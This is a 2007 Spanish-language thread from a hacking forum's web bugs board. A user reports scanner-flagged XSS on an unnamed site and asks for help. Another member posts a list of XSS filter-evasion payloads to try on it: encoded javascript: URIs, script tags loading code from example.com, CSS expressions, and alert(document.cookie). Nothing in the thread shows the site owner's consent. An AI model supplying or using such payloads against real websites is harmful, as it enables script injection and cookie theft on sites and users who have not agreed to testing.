elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Ayuda Con XSS
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda Con XSS  (Leído 3,499 veces)
Wolftein

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Ayuda Con XSS
« en: 29 Septiembre 2007, 20:59 pm »

Hola Q Tal..

Estoy Nesecitando Ayuda.. Acabo De Scanear Una Pagina Con El Segurity Shadow Scanner Y me Salta Que Tiene Vulnerabilidad de XSS

http://WEB/?N=D
http://WEB/enlaces/?N=D
http://WEB/analog/?N=D

ADemas Me Salta: Apache Mod_IMAP Referer Cross-Site Scripting Vulnerability

Alguien Me Podria Ayudar?
En línea

‭lipman


Desconectado Desconectado

Mensajes: 3.062



Ver Perfil WWW
Re: Ayuda Con XSS
« Respuesta #1 en: 29 Septiembre 2007, 23:39 pm »

Ayuda a qué?

Tendrias que cambiar el D por el código, o a que te refieres?
En línea

Wolftein

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Ayuda Con XSS
« Respuesta #2 en: 30 Septiembre 2007, 00:38 am »

No Anda Remplazando..
En línea

dimitrix


Desconectado Desconectado

Mensajes: 4.847



Ver Perfil WWW
Re: Ayuda Con XSS
« Respuesta #3 en: 12 Octubre 2007, 23:32 pm »

Citar
ADemas Me Salta: Apache Mod_IMAP Referer Cross-Site Scripting Vulnerability
???

Supongo que si pones http://WEB/?N=D y no la web, no te podremos ayudar tanto, seguramente no la pondrás, para poder decir "Lo descubri yo", o quien sabe, la cuestión es que si no nos dices la web, no te podremos ayudar igual.
En línea




yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Ayuda Con XSS
« Respuesta #4 en: 13 Octubre 2007, 12:23 pm »

Citar
En línea

Falso Positivo

Desconectado Desconectado

Mensajes: 243



Ver Perfil WWW
Re: Ayuda Con XSS
« Respuesta #5 en: 14 Octubre 2007, 01:17 am »

Hola, a lo mejor se pueden estar filtrando algunos caracteres para evitar el XSS.
Una vez alguien del foro que no recuerdo dejo una lista de codigos para SQL injection y me sirvio bastante.
Asi que dejo mi lista para XSS.
Prueba estos:
Código:
>"><ScRiPt%20%0a%0d>alert(1446033991)%3B</ScRiPt>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=&#x22;&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;
&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x50;&#x4C;&#x41;&#x59;&#x48;
&#x41;&#x43;&#x4B;&#x2E;&#x4E;&#x45;&#x54;&#x27;&#x29;&#x22;>

<IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">

<SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<iframe src=http://example.com/scriptlet.html <

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert(document.cookie)>

<IMG DYNSRC="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<BR SIZE="&{alert('XSS')}">

<IMG SRC='vbscript:msgbox("XSS")'>

<TABLE BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="width: expression(alert('XSS'));">

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<?='<SCRIPT>alert("XSS")</SCRIPT>'?>

<A HREF="javascript:document.location='http://www.example.com/'">XSS</A>

···FROM PROVENTIA···

-->//"><script>alert(/XSS%20vulnerability%20proventia%20s0x by Alex Hernandez/);</script>

-->//"><script>alert(document.cookie)</script>

-->//"><script>alert(document.domain)</script>

Saludos.
En línea

Don't worry, be hacked....
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines